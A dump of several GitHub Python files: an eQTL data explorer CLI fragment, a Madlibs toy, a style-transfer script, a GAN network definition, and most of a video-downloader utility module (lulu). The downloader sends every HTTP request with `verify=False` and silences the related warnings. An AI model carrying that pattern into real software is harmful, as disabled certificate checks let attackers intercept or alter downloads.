explorer.get_list_of_tissues()\n for tissue in tissues:\n print(tissue)\n\n if args.tissue is not None: # pragma: no cover\n studies = explorer.get_studies_of_tissue(args.tissue)\n study_list = [study for study in studies]\n if studies is None:\n print(\"The tissue does not exist: \", args.tissue)\n else:\n print(\"Tissue \" + args.tissue + \" belongs to the following studies: \" + ','.join(study_list))\n\nif __name__ == \"__main__\":\n main() # pragma: no cover\n\n\ndef argument_parser(args):\n parser = argparse.ArgumentParser() # pragma: no cover\n parser.add_argument('-molecular_phenotypes', action='store_true', help='List all the molecular_phenotypes') # pragma: no cover\n parser.add_argument('-molecular_phenotype', help='List all the studies for a molecular_phenotype') # pragma: no cover\n parser.add_argument('-studies', action='store_true', help='List all the studies') # pragma: no cover\n parser.add_argument('-study', help='Will list \\'trait: study\\' if it exists') # pragma: no cover\n parser.add_argument('-tissues', action='store_true', help='List all the tissues') # pragma: no cover\n parser.add_argument('-tissue', help='Will list \\'study: tissue\\' if it exists') # pragma: no cover\n parser.add_argument('-chromosomes', action='store_true', help='Will list all the chromosomes') # pragma: no cover\n parser.add_argument('-genes', action='store_true', help='List all the genes') # pragma: no cover\n properties_handler.set_properties() # pragma: no cover\n\n return parser.parse_args(args) # pragma: no cover\n","repo_name":"eQTL-Catalogue/eQTL-SumStats","sub_path":"sumstats/api_v1/explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"8316049690","text":"print(\"Welcome!\")\r\nprint(\"Lets play Madlibs! Please enter the following ↓\")\r\n\r\nadj = input(\"Type in an adjective: \")\r\nverb1 = input(\"Type in a verb: \")\r\nverb2 = input(\"Type in another verb: \")\r\nfamous_person = input(\"Lastly, type in a famous person: \")\r\n\r\nmadlib = \"Games are so {adj}, they make me so excited all the time because I love to {verb1}. Stay hydrated and {verb2} like you're {famous_person}\".format(adj=adj, verb1=verb2, verb2=verb2, famous_person=famous_person)\r\n\r\nprint(madlib)\r\n","repo_name":"ibotsh/Madlib","sub_path":"Madlib.py","file_name":"Madlib.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3944589872","text":"import tensorflow_hub as hub\nimport cv2\nfrom PIL import Image\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport IPython.display as display\nimport os\nimport tensorflow as tf\nfrom torchvision import transforms\nimport json\nfrom utils.models import get_pretrained_mobile_net\nfrom utils.config import config\nimport torch\n\n# Load compressed models from tensorflow_hub\nos.environ['TFHUB_MODEL_LOAD_FORMAT'] = 'COMPRESSED'\n\nmpl.rcParams['figure.figsize'] = (12, 12)\nmpl.rcParams['axes.grid'] = False\n\nhub_model = hub.load(\n 'https://tfhub.dev/google/magenta/arbitrary-image-stylization-v1-256/2')\n\n# define a function to load pictures, limited to 512 pixels\ndef tensor_to_image(tensor):\n tensor = tensor*255\n tensor = np.array(tensor, dtype=np.uint8)\n if np.ndim(tensor) > 3:\n assert tensor.shape[0] == 1\n tensor = tensor[0]\n return Image.fromarray(tensor)\n\ndef style_transfer(output_path, style_images, content_image):\n i=0\n sentiments = []\n for style in style_images:\n stylized_image = hub_model(tf.constant(\n content_image), tf.constant(style))[0]\n output = tensor_to_image(stylized_image)\n output = np.array(output)\n cv2.imwrite(output_path + '_stylized'+ str(i)+ '.jpeg', output)\n img = Image.open(output_path + '_stylized'+ str(i)+ '.jpeg')\n img = img.convert('RGB')\n\n convert_tensor = transforms.ToTensor()\n img = convert_tensor(img)\n\n sentiment = style_eval([img], output_path)\n sentiments.append(sentiment[0])\n # style_eval(output, output_path)\n i=i+1\n _write_json_metadata(sentiments, output_path)\n\n# evaluate valence and arousal value of stylized image\ndef style_eval(styled_output, output_path):\n image_sentiment_model = \"./models/image_sentiment.model\"\n sentiment_model = get_pretrained_mobile_net()\n sentiment_model.to(config['device'])\n sentiment_model.load_state_dict(torch.load(image_sentiment_model))\n \n\n # Feed-forward image sentiment analysis\n eval_images = torch.stack(styled_output).to(config['device'])\n sentiment = sentiment_model(eval_images)\n return sentiment\n\ndef _write_json_metadata(predictions, output_path):\n metadata = []\n # print(len(predictions))\n for i in range(len(predictions)):\n metadata.append({\n 'image_arousal': float(predictions[i][0]),\n 'image_valence': float(predictions[i][1]),\n })\n\n with open(output_path + '_stylized.json', \"w\") as f:\n json.dump(metadata, f)","repo_name":"trrrrr2312/MusicEmotion","sub_path":"utils/add_style.py","file_name":"add_style.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70945178660","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass CA_NET(nn.Module):\r\n def __init__(self, embed_dim, is_cuda=True):\r\n super(CA_NET, self).__init__()\r\n self.t_dim = 1024\r\n self.c_dim = embed_dim\r\n self.fc = nn.Linear(self.t_dim, self.c_dim * 2, bias=True)\r\n self.relu = nn.ReLU()\r\n self.is_cuda = is_cuda\r\n\r\n def encode(self, text_embedding):\r\n x = self.relu(self.fc(text_embedding))\r\n mu = x[:, :self.c_dim]\r\n logvar = x[:, self.c_dim:]\r\n return mu, logvar\r\n\r\n def reparametrize(self, mu, logvar):\r\n std = logvar.mul(0.5).exp_()\r\n if self.is_cuda:\r\n eps = torch.cuda.FloatTensor(std.size()).normal_()\r\n else:\r\n eps = torch.FloatTensor(std.size()).normal_()\r\n #eps = Variable(eps)\r\n return eps.mul(std).add_(mu)\r\n\r\n def forward(self, text_embedding):\r\n mu, logvar = self.encode(text_embedding)\r\n c_code = self.reparametrize(mu, logvar)\r\n return c_code, mu, logvar\r\n\r\ndef KL_loss(mu, logvar):\r\n # -0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\r\n KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)\r\n KLD = torch.mean(KLD_element).mul_(-0.5)\r\n return KLD\r\n\r\n\r\n# ================ RESNET GENERATOR\r\n\r\ndef conv3x3(in_planes, out_planes, stride=1):\r\n \"3x3 convolution with padding\"\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\r\n padding=1, bias=False)\r\n\r\n\r\n# Upsale the spatial size by a factor of 2\r\ndef upBlock(in_planes, out_planes):\r\n block = nn.Sequential(\r\n nn.Upsample(scale_factor=2, mode='nearest'),\r\n conv3x3(in_planes, out_planes),\r\n nn.BatchNorm2d(out_planes),\r\n nn.ReLU(True))\r\n return block\r\n\r\n\r\nclass ResBlock(nn.Module):\r\n def __init__(self, channel_num):\r\n super(ResBlock, self).__init__()\r\n self.block = nn.Sequential(\r\n conv3x3(channel_num, channel_num),\r\n nn.BatchNorm2d(channel_num),\r\n nn.ReLU(True),\r\n conv3x3(channel_num, channel_num),\r\n nn.BatchNorm2d(channel_num))\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n def forward(self, x):\r\n residual = x\r\n out = self.block(x)\r\n out += residual\r\n out = self.relu(out)\r\n return out\r\n\r\nclass Generator(nn.Module):\r\n def __init__(self):\r\n super(Generator, self).__init__()\r\n self.gf_dim = 128 #cfg.GAN.GF_DIM\r\n self.ef_dim = 256 #cfg.GAN.CONDITION_DIM\r\n self.z_dim = 100 #cfg.Z_DIM\r\n self.define_module()\r\n\r\n def _make_layer(self, block, channel_num):\r\n layers = []\r\n for i in range(4):#cfg.GAN.R_NUM\r\n layers.append(block(channel_num))\r\n return nn.Sequential(*layers)\r\n\r\n def define_module(self):\r\n ngf = self.gf_dim\r\n # TEXT.DIMENSION -> GAN.CONDITION_DIM\r\n self.ca_net = CA_NET(self.ef_dim)\r\n self.linear = nn.Linear(self.ef_dim+self.z_dim, ngf * 4 * 16 * 16)\r\n self.hr_joint = nn.Sequential(\r\n nn.BatchNorm2d(ngf * 4),\r\n nn.ReLU(True)\r\n )\r\n self.residual = self._make_layer(ResBlock, ngf * 4)\r\n # --> 2ngf x 32 x 32\r\n self.upsample1 = upBlock(ngf * 4, ngf*2)\r\n # --> ngf x 64 x 64\r\n self.upsample2 = upBlock(ngf*2, ngf)\r\n # --> ngf // 2 x 128 x 128\r\n self.upsample3 = upBlock(ngf, ngf // 2)\r\n # --> ngf // 4 x 256 x 256\r\n self.upsample4 = upBlock(ngf // 2, ngf // 4)\r\n # --> 3 x 256 x 256\r\n self.img = nn.Sequential(\r\n conv3x3(ngf // 2, 3),\r\n nn.Tanh())\r\n\r\n def forward(self, text_embedding, noise):\r\n c_code, mu, logvar = self.ca_net(text_embedding)\r\n i_c_code = torch.cat([noise, c_code], 1)\r\n i_c_code = self.linear(i_c_code)\r\n i_c_code = i_c_code.view(i_c_code.size(0), 4*self.gf_dim, 16, 16)\r\n h_code = self.hr_joint(i_c_code)\r\n h_code = self.residual(h_code)\r\n h_code = self.upsample1(h_code)\r\n h_code = self.upsample2(h_code)\r\n h_code = self.upsample3(h_code)\r\n\r\n fake_img = self.img(h_code)\r\n return fake_img, mu, logvar\r\n\r\n# ================ Disc 128x128\r\ndef Block3x3_leakRelu(in_planes, out_planes):\r\n block = nn.Sequential(\r\n conv3x3(in_planes, out_planes),\r\n nn.BatchNorm2d(out_planes),\r\n nn.LeakyReLU(0.2, inplace=True)\r\n )\r\n return block\r\n\r\n\r\n# Downsale the spatial size by a factor of 2\r\ndef downBlock(in_planes, out_planes):\r\n block = nn.Sequential(\r\n nn.Conv2d(in_planes, out_planes, 4, 2, 1, bias=False),\r\n nn.BatchNorm2d(out_planes),\r\n nn.LeakyReLU(0.2, inplace=True)\r\n )\r\n return block\r\n\r\n\r\n# Downsale the spatial size by a factor of 16\r\ndef encode_image_by_16times(ndf):\r\n encode_img = nn.Sequential(\r\n # --> state size. ndf x in_size/2 x in_size/2\r\n nn.Conv2d(3, ndf, 4, 2, 1, bias=False),\r\n nn.LeakyReLU(0.2, inplace=True),\r\n # --> state size 2ndf x x in_size/4 x in_size/4\r\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\r\n nn.BatchNorm2d(ndf * 2),\r\n nn.LeakyReLU(0.2, inplace=True),\r\n # --> state size 4ndf x in_size/8 x in_size/8\r\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\r\n nn.BatchNorm2d(ndf * 4),\r\n nn.LeakyReLU(0.2, inplace=True),\r\n # --> state size 8ndf x in_size/16 x in_size/16\r\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\r\n nn.BatchNorm2d(ndf * 8),\r\n nn.LeakyReLU(0.2, inplace=True)\r\n )\r\n return encode_img\r\n\r\n\r\nclass DiscriminatorLogits(nn.Module):\r\n def __init__(self, ndf, nef, bcondition=False):\r\n super(DiscriminatorLogits, self).__init__()\r\n self.df_dim = ndf\r\n self.ef_dim = nef\r\n self.bcondition = bcondition\r\n if self.bcondition:\r\n self.jointConv = Block3x3_leakRelu(ndf * 8 + nef, ndf * 8)\r\n\r\n self.outlogits = nn.Sequential(\r\n nn.Conv2d(ndf * 8, 1, kernel_size=4, stride=4),\r\n nn.Sigmoid())\r\n\r\n def forward(self, h_code, c_code=None):\r\n if self.bcondition and c_code is not None:\r\n # conditioning output\r\n c_code = c_code.view(-1, self.ef_dim, 1, 1)\r\n c_code = c_code.repeat(1, 1, 4, 4)\r\n # state size (ngf+egf) x 4 x 4\r\n h_c_code = torch.cat((h_code, c_code), 1)\r\n # state size ngf x in_size x in_size\r\n h_c_code = self.jointConv(h_c_code)\r\n else:\r\n h_c_code = h_code\r\n\r\n output = self.outlogits(h_c_code)\r\n return output.view(-1)\r\n\r\nclass Discriminator(nn.Module):\r\n def __init__(self):\r\n super(Discriminator, self).__init__()\r\n self.ndf = 64\r\n self.nef = 256\r\n self.img_code_s16 = encode_image_by_16times(self.ndf)\r\n self.img_code_s32 = downBlock(self.ndf * 8, self.ndf * 16)\r\n self.img_code_s32_1 = Block3x3_leakRelu(self.ndf * 16, self.ndf * 8)\r\n #\r\n self.uncond_output = DiscriminatorLogits(self.ndf, self.nef, bcondition=False)\r\n self.cond_output = DiscriminatorLogits(self.ndf, self.nef, bcondition=True)\r\n\r\n self.fc_rot = nn.Sequential(\r\n nn.Linear(in_features=self.ndf*8*4*4, out_features=self.ndf),\r\n nn.Linear(in_features=self.ndf, out_features=4),\r\n )\r\n\r\n def forward(self, x_var):\r\n x_code8 = self.img_code_s16(x_var) # 8 x 8 x 8df\r\n x_code4 = self.img_code_s32(x_code8) # 4 x 4 x 16df\r\n x_code4 = self.img_code_s32_1(x_code4) # 4 x 4 x 8df\r\n\r\n rot = x_code4.view(x_code4.size(0), self.ndf*8*4*4)\r\n rot = self.fc_rot(rot)\r\n return x_code4, rot\r\n","repo_name":"Jityan/SSTIS","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14886148726","text":"#!/usr/bin/env python\n\nimport io\nimport os\nimport re\nimport sys\nimport time\nimport socket\nimport locale\nimport logging\nimport argparse\nfrom urllib import parse\nfrom html import unescape\nfrom http import cookiejar\nfrom importlib import import_module\nfrom multiprocessing.dummy import Pool\n\nimport urllib3\nimport requests\n\nfrom lulu.config import (\n SITES,\n FAKE_HEADERS,\n)\nfrom lulu.util import log, term\nfrom lulu.version import __version__\nfrom lulu import json_output as json_output_\nfrom lulu.util.strings import get_filename\ntry:\n sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf8')\nexcept Exception:\n pass\n\n\ndry_run = False\njson_output = False\nforce = False\nplayer = None\nextractor_proxy = None\ncookies = None\noutput_filename = None\n\n\nif sys.stdout.isatty():\n default_encoding = sys.stdout.encoding.lower()\nelse:\n default_encoding = locale.getpreferredencoding().lower()\n\n\n# disable SSL verify=False warning\nurllib3.disable_warnings()\nsession = requests.Session()\n\n\ndef rc4(key, data):\n # all encryption algo should work on bytes\n assert type(key) == type(data) and type(key) == type(b'')\n state = list(range(256))\n j = 0\n for i in range(256):\n j += state[i] + key[i % len(key)]\n j &= 0xff\n state[i], state[j] = state[j], state[i]\n\n i = 0\n j = 0\n out_list = []\n for char in data:\n i += 1\n i &= 0xff\n j += state[i]\n j &= 0xff\n state[i], state[j] = state[j], state[i]\n prn = state[(state[i] + state[j]) & 0xff]\n out_list.append(char ^ prn)\n\n return bytes(out_list)\n\n\ndef general_m3u8_extractor(url, headers=FAKE_HEADERS):\n m3u8_list = get_content(url, headers=headers).split('\\n')\n urls = []\n for line in m3u8_list:\n line = line.strip()\n if line and not line.startswith('#'):\n if line.startswith('http'):\n urls.append(line)\n else:\n seg_url = parse.urljoin(url, line)\n urls.append(seg_url)\n return urls\n\n\ndef maybe_print(*s):\n try:\n print(*s)\n except Exception:\n pass\n\n\ndef tr(s):\n if default_encoding == 'utf-8':\n return s\n else:\n return s\n # return str(s.encode('utf-8'))[2:-1]\n\n\ndef match1(text, *patterns):\n \"\"\"Scans through a string for substrings matched some patterns\n (first-subgroups only).\n\n Args:\n text: A string to be scanned.\n patterns: Arbitrary number of regex patterns.\n\n Returns:\n When only one pattern is given, returns a string\n (None if no match found).\n When more than one pattern are given, returns a list of strings\n ([] if no match found).\n \"\"\"\n\n if len(patterns) == 1:\n pattern = patterns[0]\n match = re.search(pattern, text)\n if match:\n return match.group(1)\n else:\n return None\n else:\n ret = []\n for pattern in patterns:\n match = re.search(pattern, text)\n if match:\n ret.append(match.group(1))\n return ret\n\n\ndef matchall(text, patterns):\n \"\"\"Scans through a string for substrings matched some patterns.\n\n Args:\n text: A string to be scanned.\n patterns: a list of regex pattern.\n\n Returns:\n a list if matched. empty if not.\n \"\"\"\n\n ret = []\n for pattern in patterns:\n match = re.findall(pattern, text)\n ret += match\n\n return ret\n\n\ndef launch_player(player, urls, refer=''):\n import subprocess\n import shlex\n player = shlex.split(player)\n params = []\n ua = FAKE_HEADERS['User-Agent']\n if player[0] == 'mpv':\n params.append('--no-ytdl')\n params.extend(['--user-agent', ua])\n if refer:\n params.extend([\n '--http-header-fields',\n 'referer: {}'.format(refer)\n ])\n subprocess.call(player + params + list(urls))\n\n\ndef parse_query_param(url, param):\n \"\"\"Parses the query string of a URL and returns the value of a parameter.\n\n Args:\n url: A URL.\n param: A string representing the name of the parameter.\n\n Returns:\n The value of the parameter.\n \"\"\"\n\n try:\n return parse.parse_qs(parse.urlparse(url).query)[param][0]\n except Exception:\n return None\n\n\ndef unicodize(text):\n return re.sub(\n r'\\\\u([0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f])',\n lambda x: chr(int(x.group(0)[2:], 16)),\n text\n )\n\n\ndef ungzip(data):\n \"\"\"Decompresses data for Content-Encoding: gzip.\n \"\"\"\n from io import BytesIO\n import gzip\n buffer = BytesIO(data)\n f = gzip.GzipFile(fileobj=buffer)\n return f.read()\n\n\ndef get_location(url):\n logging.debug('get_location: {}'.format(url))\n response = session.get(url)\n return response.url\n\n\ndef urlopen_with_retry(*args, method='get', **kwargs):\n retry_time = 3\n for i in range(retry_time):\n try:\n return getattr(session, method)(\n *args, stream=True, verify=False, **kwargs\n )\n except requests.Timeout as e:\n logging.debug('request attempt {} timeout'.format(str(i + 1)))\n if i + 1 == retry_time:\n raise e\n # try to tackle youku CDN fails\n except requests.HTTPError as http_error:\n logging.debug('HTTP Error with code{}'.format(\n http_error.response.status_code\n ))\n if i + 1 == retry_time:\n raise http_error\n\n\ndef get_content(url, headers=FAKE_HEADERS):\n \"\"\"Gets the content of a URL via sending a HTTP GET request.\n\n Args:\n url: A URL.\n headers: Request headers used by the client.\n decoded: Whether decode the response body using UTF-8 or the charset\n specified in Content-Type.\n\n Returns:\n The content as a string.\n \"\"\"\n\n logging.debug('get_content: {}'.format(url))\n\n if cookies:\n session.cookies = cookies\n\n response = urlopen_with_retry(url, headers=headers)\n data = response.text\n return data\n\n\ndef post_content(url, headers=FAKE_HEADERS, post_data={}):\n \"\"\"Post the content of a URL via sending a HTTP POST request.\n\n Args:\n url: A URL.\n headers: Request headers used by the client.\n decoded: Whether decode the response body using UTF-8 or the charset\n specified in Content-Type.\n\n Returns:\n The content as a string.\n \"\"\"\n\n logging.debug('post_content: {} \\n post_data: {}'.format(url, post_data))\n\n if cookies:\n session.cookies = cookies\n\n response = urlopen_with_retry(\n url, method='post', headers=headers, data=post_data\n )\n data = response.text\n return data\n\n\ndef url_size(url, headers=FAKE_HEADERS):\n response = urlopen_with_retry(url, headers=headers)\n size = response.headers['content-length']\n return int(size) if size is not None else float('inf')\n\n\ndef urls_size(urls, headers=FAKE_HEADERS):\n return sum([url_size(url, headers=headers) for url in urls])\n\n\ndef get_head(url, headers=FAKE_HEADERS):\n logging.debug('get_head: {}'.format(url))\n res = urlopen_with_retry(url, headers=headers)\n return res.headers\n\n\ndef url_info(url, headers=FAKE_HEADERS, refer=None):\n logging.debug('url_info: {}'.format(url))\n if refer:\n headers.update({'Referer': refer})\n headers = get_head(url, headers)\n\n _type = headers['content-type']\n if _type == 'image/jpg; charset=UTF-8' or _type == 'image/jpg':\n _type = 'audio/mpeg' # fix for netease\n mapping = {\n 'video/3gpp': '3gp',\n 'video/f4v': 'flv',\n 'video/mp4': 'mp4',\n 'video/MP2T': 'ts',\n 'video/quicktime': 'mov',\n 'video/webm': 'webm',\n 'video/x-flv': 'flv',\n 'video/x-ms-asf': 'asf',\n 'audio/mp4': 'mp4',\n 'audio/mpeg': 'mp3',\n 'audio/wav': 'wav',\n 'audio/x-wav': 'wav',\n 'audio/wave': 'wav',\n 'image/jpeg': 'jpg',\n 'image/png': 'png',\n 'image/gif': 'gif',\n 'application/pdf': 'pdf',\n }\n if _type in mapping:\n ext = mapping[_type]\n elif '.' in url:\n _type = ext = url.split('.')[-1]\n else:\n _type = None\n if headers['content-disposition']:\n try:\n filename = parse.unquote(\n match1(\n headers['content-disposition'], r'filename=\"?([^\"]+)\"?'\n )\n )\n if len(filename.split('.')) > 1:\n ext = filename.split('.')[-1]\n else:\n ext = None\n except Exception:\n ext = None\n else:\n ext = None\n\n if headers.get('transfer-encoding') != 'chunked':\n size = headers['content-length'] and int(headers['content-length'])\n else:\n size = None\n\n return _type, ext, size\n\n\ndef url_locations(urls, headers=FAKE_HEADERS):\n locations = []\n for url in urls:\n logging.debug('url_locations: %s' % url)\n\n response = urlopen_with_retry(url, headers=headers)\n\n locations.append(response.url)\n return locations\n\n\ndef url_save(\n url, filepath, bar, refer=None, is_part=False, headers=None, timeout=None,\n **kwargs\n):\n tmp_headers = headers.copy() if headers else FAKE_HEADERS.copy()\n # When a referer specified with param refer,\n # the key must be 'Referer' for the hack here\n if refer:\n tmp_headers['Referer'] = refer\n file_size = url_size(url, headers=tmp_headers)\n\n if os.path.exists(filepath):\n if not force and file_size == os.path.getsize(filepath):\n if not is_part:\n if bar:\n bar.done()\n print(\n 'Skipping {}: file already exists'.format(\n tr(os.path.basename(filepath))\n )\n )\n else:\n if bar:\n bar.update_received(file_size)\n return\n else:\n if not is_part:\n if bar:\n bar.done()\n print('Overwriting %s' % tr(os.path.basename(filepath)), '...')\n elif not os.path.exists(os.path.dirname(filepath)):\n os.mkdir(os.path.dirname(filepath))\n\n temp_filepath = filepath + '.download' if file_size != float('inf') \\\n else filepath\n received = 0\n if not force:\n open_mode = 'ab'\n\n if os.path.exists(temp_filepath):\n received += os.path.getsize(temp_filepath)\n if bar:\n bar.update_received(os.path.getsize(temp_filepath))\n else:\n open_mode = 'wb'\n\n if received < file_size:\n if received:\n tmp_headers['Range'] = 'bytes=' + str(received) + '-'\n if refer:\n tmp_headers['Referer'] = refer\n kwargs = {\n 'headers': tmp_headers,\n }\n if timeout:\n kwargs['timeout'] = timeout\n response = urlopen_with_retry(url, **kwargs)\n try:\n range_start = int(\n response.headers[\n 'content-range'\n ][6:].split('/')[0].split('-')[0]\n )\n end_length = int(\n response.headers['content-range'][6:].split('/')[1]\n )\n range_length = end_length - range_start\n except Exception:\n content_length = response.headers['content-length']\n range_length = int(content_length) if content_length \\\n else float('inf')\n\n if file_size != received + range_length:\n received = 0\n if bar:\n bar.received = 0\n open_mode = 'wb'\n\n with open(temp_filepath, open_mode) as output:\n for chunk in response.iter_content(chunk_size=2048):\n if chunk:\n output.write(chunk)\n received += len(chunk)\n if bar:\n bar.update_received(len(chunk))\n\n assert received == os.path.getsize(temp_filepath), '{} == {} == {}'.format(\n received, os.path.getsize(temp_filepath), temp_filepath\n )\n\n if os.access(filepath, os.W_OK):\n # on Windows rename could fail if destination filepath exists\n os.remove(filepath)\n os.rename(temp_filepath, filepath)\n\n\nclass SimpleProgressBar:\n term_size = term.get_terminal_size()[1]\n\n def __init__(self, total_size, total_pieces=1):\n self.displayed = False\n self.total_size = total_size\n self.total_pieces = total_pieces\n self.current_piece = 1\n self.received = 0\n self.speed = ''\n self.last_updated = time.time()\n\n total_pieces_len = len(str(total_pieces))\n # 38 is the size of all statically known size in self.bar\n total_str = '%5s' % round(self.total_size / 1048576, 1)\n total_str_width = max(len(total_str), 5)\n self.bar_size = self.term_size - 28 - 2 * total_pieces_len \\\n - 2 * total_str_width\n self.bar = '{:>4}%% ({:>%s}/%sMB) ├{:─<%s}┤[{:>%s}/{:>%s}] {}' % (\n total_str_width, total_str, self.bar_size, total_pieces_len,\n total_pieces_len\n )\n\n def update(self):\n self.displayed = True\n bar_size = self.bar_size\n percent = round(self.received * 100 / self.total_size, 1)\n if percent >= 100:\n percent = 100\n dots = bar_size * int(percent) // 100\n plus = int(percent) - dots // bar_size * 100\n if plus > 0.8:\n plus = '█'\n elif plus > 0.4:\n plus = '>'\n else:\n plus = ''\n bar = '█' * dots + plus\n bar = self.bar.format(\n percent, round(self.received / 1048576, 1), bar,\n self.current_piece, self.total_pieces, self.speed\n )\n sys.stdout.write('\\r' + bar)\n sys.stdout.flush()\n\n def update_received(self, n):\n self.received += n\n time_diff = time.time() - self.last_updated\n bytes_ps = n / time_diff if time_diff else 0\n if bytes_ps >= 1024 ** 3:\n self.speed = '{:4.0f} GB/s'.format(bytes_ps / 1024 ** 3)\n elif bytes_ps >= 1024 ** 2:\n self.speed = '{:4.0f} MB/s'.format(bytes_ps / 1024 ** 2)\n elif bytes_ps >= 1024:\n self.speed = '{:4.0f} kB/s'.format(bytes_ps / 1024)\n else:\n self.speed = '{:4.0f} B/s'.format(bytes_ps)\n self.last_updated = time.time()\n self.update()\n\n def update_piece(self, n):\n self.current_piece = n\n\n def done(self):\n if self.displayed:\n print()\n self.displayed = False\n\n\nclass PiecesProgressBar:\n def __init__(self, total_size, total_pieces=1):\n self.displayed = False\n self.total_size = total_size\n self.total_pieces = total_pieces\n self.current_piece = 1\n self.received = 0\n\n def update(self):\n self.displayed = True\n bar = '{0:>5}%[{1:<40}] {2}/{3}'.format(\n '', '=' * 40, self.current_piece, self.total_pieces\n )\n sys.stdout.write('\\r' + bar)\n sys.stdout.flush()\n\n def update_received(self, n):\n self.received += n\n self.update()\n\n def update_piece(self, n):\n self.current_piece = n\n\n def done(self):\n if self.displayed:\n print()\n self.displayed = False\n\n\nclass DummyProgressBar:\n def __init__(self, *args):\n pass\n\n def update_received(self, n):\n pass\n\n def update_piece(self, n):\n pass\n\n def done(self):\n pass\n\n\ndef get_output_filename(urls, title, ext, output_dir, merge):\n # lame hack for the --output-filename option\n global output_filename\n if output_filename:\n if ext:\n return output_filename + '.' + ext\n return output_filename\n\n merged_ext = ext\n if (len(urls) > 1) and merge:\n from .processor.ffmpeg import has_ffmpeg_installed\n if ext in ['flv', 'f4v']:\n if has_ffmpeg_installed():\n merged_ext = 'mp4'\n else:\n merged_ext = 'flv'\n elif ext == 'mp4':\n merged_ext = 'mp4'\n elif ext == 'ts':\n if has_ffmpeg_installed():\n merged_ext = 'mkv'\n else:\n merged_ext = 'ts'\n return '{}.{}'.format(title, merged_ext)\n\n\ndef download_urls(\n urls, title, ext, total_size, output_dir='.', refer=None, merge=True,\n headers={}, thread=0, **kwargs\n):\n assert urls\n if json_output:\n json_output_.download_urls(\n urls=urls, title=title, ext=ext, total_size=total_size,\n refer=refer\n )\n return\n if dry_run:\n print('Real URLs:\\n{}'.format('\\n'.join(urls)))\n return\n\n if player:\n launch_player(player, urls, refer=refer)\n return\n\n if not total_size:\n try:\n total_size = urls_size(urls, headers=headers)\n except Exception:\n import traceback\n traceback.print_exc(file=sys.stdout)\n pass\n\n title = tr(get_filename(title))\n output_file = get_output_filename(urls, title, ext, output_dir, merge)\n output_filepath = os.path.join(output_dir, output_file)\n\n if total_size:\n if not force and os.path.exists(output_filepath) \\\n and os.path.getsize(output_filepath) >= total_size * 0.9:\n print('Skipping {}: file already exists'.format(output_filepath))\n print()\n return\n bar = SimpleProgressBar(total_size, len(urls))\n else:\n bar = PiecesProgressBar(total_size, len(urls))\n\n if len(urls) == 1:\n url = urls[0]\n print('Downloading {} ...'.format(tr(output_file)))\n bar.update()\n url_save(\n url, output_filepath, bar, refer=refer, headers=headers, **kwargs\n )\n bar.done()\n else:\n print('Downloading {}.{} ...'.format(tr(title), ext))\n parts = [''] * len(urls)\n bar.update()\n piece = 0\n\n def _download(url):\n # Closure\n nonlocal piece\n index = urls.index(url)\n filename = '{}[{:0>2d}].{}'.format(title, index, ext)\n filepath = os.path.join(output_dir, filename)\n parts[index] = filepath # 防止多线程环境下文件顺序会乱\n piece += 1\n bar.update_piece(piece)\n url_save(\n url, filepath, bar, refer=refer, is_part=True, headers=headers,\n **kwargs\n )\n if thread:\n with Pool(processes=thread) as pool:\n pool.map(_download, urls)\n else:\n for url in urls:\n _download(url)\n bar.done()\n\n if not merge:\n print()\n return\n\n if 'av' in kwargs and kwargs['av']:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_av\n ret = ffmpeg_concat_av(parts, output_filepath, ext)\n print('Merged into {}'.format(output_file))\n if ret == 0:\n for part in parts:\n os.remove(part)\n\n elif ext in ['flv', 'f4v']:\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_flv_to_mp4\n ffmpeg_concat_flv_to_mp4(parts, output_filepath)\n else:\n from .processor.join_flv import concat_flv\n concat_flv(parts, output_filepath)\n print('Merged into {}'.format(output_file))\n except Exception:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'mp4':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_mp4_to_mp4\n ffmpeg_concat_mp4_to_mp4(parts, output_filepath)\n else:\n print('Merged into {}'.format(output_file))\n try:\n from .processor.join_mp4 import concat_mp4\n concat_mp4(parts, output_filepath)\n except Exception:\n try:\n from .processor.join_flv import concat_flv\n concat_flv(parts, output_filepath)\n except Exception:\n from .processor.join_ts import concat_ts\n concat_ts(parts, output_filepath)\n except Exception:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'ts':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_ts_to_mkv\n ffmpeg_concat_ts_to_mkv(parts, output_filepath)\n else:\n from .processor.join_ts import concat_ts\n concat_ts(parts, output_filepath)\n print('Merged into {}'.format(output_file))\n except Exception:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n else:\n print(\"Can't merge {} files\".format(ext))\n\n print()\n\n\ndef download_rtmp_url(\n url, title, ext, params={}, total_size=0, output_dir='.', refer=None,\n merge=True\n):\n assert url\n if dry_run:\n print('Real URL:\\n%s\\n' % [url])\n 